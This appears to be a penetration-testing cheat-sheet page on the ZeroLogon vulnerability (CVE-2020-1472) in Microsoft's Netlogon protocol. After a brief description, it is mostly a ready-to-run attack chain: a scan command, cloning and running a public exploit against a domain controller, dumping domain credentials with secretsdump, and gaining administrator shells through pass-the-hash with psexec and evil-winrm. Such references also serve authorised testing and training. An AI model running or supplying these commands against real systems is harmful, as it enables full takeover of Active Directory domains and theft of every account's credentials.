ZeroLogon - CVE-2020-1472
Zero Logon exploits a feature of MS-NRPC (Microsoft NetLogon Remote Protocol), a critical authentication component of Active Directory that handles authentication of user and machine accounts. This attack is made possible by a bad implementation of the cryptography.
Release Date: Sep, 2020
Impact: Elevation of Privilege
CVSS score: 10
Scan | Exploit
# scan
nxc smb $ip -u $user -p $password -M zerologon
# exploit
git clone https://github.com/dirkjanm/CVE-2020-1472.git
cd CVE-2020-1472/
python3 cve-2020-1472-exploit.py $dc_netbios_name $dc_ip
secretsdump.py -just-dc -no-pass $dc_netbios_name\$@$dc_ip
# extract administrator hash
# connect
psexec.py Administrator:@$dc_ip -hashes $hash_admin
evil-winrm -i $dc_ip -u Administrator -H $NTLM_hash
Last updated
Was this helpful?